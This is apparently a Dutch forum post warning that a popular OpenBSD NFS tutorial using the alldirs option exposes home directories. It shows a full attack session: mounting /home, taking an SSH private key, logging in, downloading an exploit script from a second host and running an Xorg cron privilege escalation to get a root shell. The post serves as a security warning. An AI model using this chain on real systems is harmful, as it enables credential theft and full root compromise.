OpenBSD NFS server opgezet met de volgende instructies (top google resultaat):
https://nixingaround.blogspot.com/2017/02/nfs-server-on-openbsd.html

Met alldirs optie!! Zie: https://man.openbsd.org/exports.5 (Bugs section)

En het onderstaande kan dan gebeuren:

root@kali:~# showmount -e 192.168.1.127
Export list for 192.168.1.127:
/home/admin/storage (everyone)
root@kali:~# mount -tnfs 192.168.1.127:/home /mnt
root@kali:~# cd /mnt
root@kali:/mnt# ls
admin
root@kali:/mnt# cd admin
root@kali:/mnt/admin# ls
storage
root@kali:/mnt/admin# cd .ssh
root@kali:/mnt/admin/.ssh# ls
authorized_keys id_rsa id_rsa.pub
root@kali:/mnt/admin/.ssh#

En dan....
https://www.exploit-db.com/exploits/45742/

root@kali:~/OpenBSD64# ssh admin@192.168.1.127 -i id_rsa
The authenticity of host '192.168.1.127 (192.168.1.127)' can't be established.
ECDSA key fingerprint is SHA256:ubmXXNW0/cj46Jj8Jal31GFKizwxl6Rs9rg4kxxutK4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.127' (ECDSA) to the list of known hosts.
Last login: Wed Oct 31 14:25:59 2018
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

OpenBSD64$ ls
storage
OpenBSD64$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin), 0(wheel)
OpenBSD64$ ftp http://192.168.1.222/openbsd64.txt
Trying 192.168.1.222...
Requesting http://192.168.1.222/openbsd64.txt
100% |**************************************************| 2488 00:00
2488 bytes received in 0.00 seconds (5.85 MB/s)
OpenBSD64$ mv openbsd64.txt openbsd64.sh
OpenBSD64$ chmod 755 openbsd64.sh
OpenBSD64$ ./openbsd64.sh
raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron
Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>

X.Org X Server 1.19.6
Release Date: 2017-12-20
X Protocol Version 11, Revision 0
Build Operating System: OpenBSD 6.4 amd64
Current Operating System: OpenBSD OpenBSD64.lan 6.4 GENERIC#349 amd64
Build Date: 11 October 2018 01:50:08PM

Current version of pixman: 0.34.0
Before reporting problems, check http://wiki.x.org
to make sure that you have the latest version.
Markers: (--) probed, (**) from config file, (==) default setting,
(++) from command line, (!!) notice, (II) informational,
(WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(++) Log file: "crontab", Time: Wed Oct 31 15:35:27 2018
(==) Using system config directory "/usr/X11R6/share/X11/xorg.conf.d"
mtrr set e0000000 1000000 failed: Device not configured
_FontTransOpen: Unable to Parse address * * * * * root /tmp/xorgasm

Be patient for a couple of minutes...

(II) Server terminated successfully (0). Closing log file.

Don't forget to cleanup and run crontab -e to reload the crontab.
-rw-r--r-- 1 root wheel 47321 Oct 31 15:35 /etc/crontab
-rwsrwxrwx 1 root wheel 7417 Oct 31 15:37 /usr/local/bin/pwned
OpenBSD64# id
uid=0(root) gid=0(wheel) groups=1000(admin), 0(wheel)
OpenBSD64#

Neem dus niet zo maar klakkeloos instructies over!!